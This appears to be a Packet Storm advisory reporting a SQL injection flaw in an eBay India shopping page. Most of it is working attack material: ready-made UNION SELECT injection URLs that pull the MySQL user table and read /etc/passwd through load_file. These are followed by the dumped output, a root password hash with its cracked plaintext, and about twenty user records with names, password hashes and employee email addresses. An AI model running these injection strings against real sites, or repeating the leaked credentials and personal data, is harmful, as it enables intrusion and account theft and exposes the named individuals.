eBay India suffers from a remote SQL injection vulnerability.
54356f37be3c8f20f5bd8d3c8c2aa018002cebca28356303b7fe602f565dcf3bHost Information
Server = Apache/2.0.52 (CentOS)
Version = 4.0.20
Powered by = PHP/5.2.0
Current User = root@localhost
Current Database = pegasusinfo
Supports Union = yes
Union Columns = 15
Url| http://shopping.ebay.in/files/template_1rupee_new.php?lpid=600
Vuln:
http://shopping.ebay.in/files/template_1rupee_new.php?lpid=600+and+1=0+ and
1=0 Union Select 1 ,2,3,4,5,6,7,8,[visible],10,11,12,13,14,15
Comment: --
Visible Column: 9
Hexed: True
Cookie:
Keyword:
Param:
Database:
Tables:users
mysql.user
mysql.user
users
Columns: Table users
username
password
email
last_login
password
password
status
user_level
username
*
http://shopping.ebay.in/files/template_1rupee_new.php?lpid=600+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,concat(user,0x3a,password),9,10,11,12,13,14+FROM+mysql.user--<http://shopping.ebay.in/files/template_1rupee_new.php?lpid=600+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,concat%28user,0x3a,password%29,9,10,11,12,13,14+FROM+mysql.user-->
*
root:05be434958638110
05be434958638110 = p@ssw0rd
*
http://shopping.ebay.in/files/template_1rupee_new.php?lpid=600+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,load_file(0x2f6574632f706173737764),9,10,11,12,13<http://shopping.ebay.in/files/template_1rupee_new.php?lpid=600+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,load_file%280x2f6574632f706173737764%29,9,10,11,12,13>
,14--*
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin
username:password:email:last_login:status:user_level:
admin:5869b69603445758e7bf9ccc3234e4e4:info@pegasusinfocorp.com:2008-10-08
13:15:51:I:1:
sandyjain:9b3c9b2f6defe2612bf5d167627c8198:sajain@ebay.com:2007-01-22
14:21:35:O:2:
jojy:c257689d9efeb64bc08935fe324ebfdd:jdevasia@ebay.com:2006-11-23
11:17:26:O:2:
murali:c74cb3422f40ff56fca49560e49c9520:mb@ebay.com:2007-07-05 15:25:42:O:2:
raviv:92c5d5c278e9d89c9d01267ccbb0a572:ravenkatesh@ebay.com:2008-03-17
13:38:26:O:2:
sandeepk:6a7248f6d310f4f9caf9c731844fb4fb:skapadia@ebay.com:2008-02-25
14:33:22:O:2:
richard:5f4dcc3b5aa765d61d8327deb882cf99:rdcosta@ebay.com:2008-11-10
17:35:07:I:2:
mahendra:5b6f5567bd8aec0e0fffb6ab260569eb:masar@ebay.com:2007-09-26
13:25:49:O:2:
meher:58afa3c863166d893646e2ce652e3508:mkaranjia@ebay.com:2008-06-17
14:58:08:O:2:
angopal:3e422d9ef8eaf16f468a133a3a183eb3:angopalakrishnan@ebay.com:2007-03-16
14:14:12:O:2:
preetir:daddd4a20002dc505d4b4b427db17bcb:prikhye@ebay.com:2007-10-24
17:32:23:O:2:
sudasgupta:51d5546002699f386705c4912d8fbe2c:sudasgupta@ebay.com:2007-08-13
16:20:49:O:2:
pmirpuri:16adf72ff898749465caa26368b588f1:pmirpuri@ebay.com:2007-02-19
16:53:26:O:2:
prd:31404e9c02cf0d64b64bed2d905db07e:sandy497@hotmail.com:2007-01-30
00:17:53:O:2:
bsampat:b5db90a88323693aec1ce3f1d2eee0f4:bsampat@ebay.com:2007-03-20
17:22:53:O:2:
prdreview:441094a91ffe27201722e2774e99c607:sandy_jain@yahoo.com:2007-02-27
14:54:20:O:2:
adesh:1fd96777aedeadb325c66f3780054765:amorajkar@ebay.com:2008-11-14
18:59:17:I:2:
alal:d56a5fe97069c38246fed24af265226f:alal@ebay.com:2007-07-12 15:25:36:O:2:
shiju:12c8e5080c3b9b17c733775bb9d91085:shthomas@ebay.com:2007-12-03
14:37:28:O:2:
pkumar:762354b9157924dcd7bee07a41ac8fec:pkumar@ebay.com:2008-06-17
18:36:20:O:2:
test_csv:1918d8b69ed5893a4cf2f13fafdeffe1:test_csv@test.com:2008-04-03
17:52:42:O:2:
Rohit Bansal
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed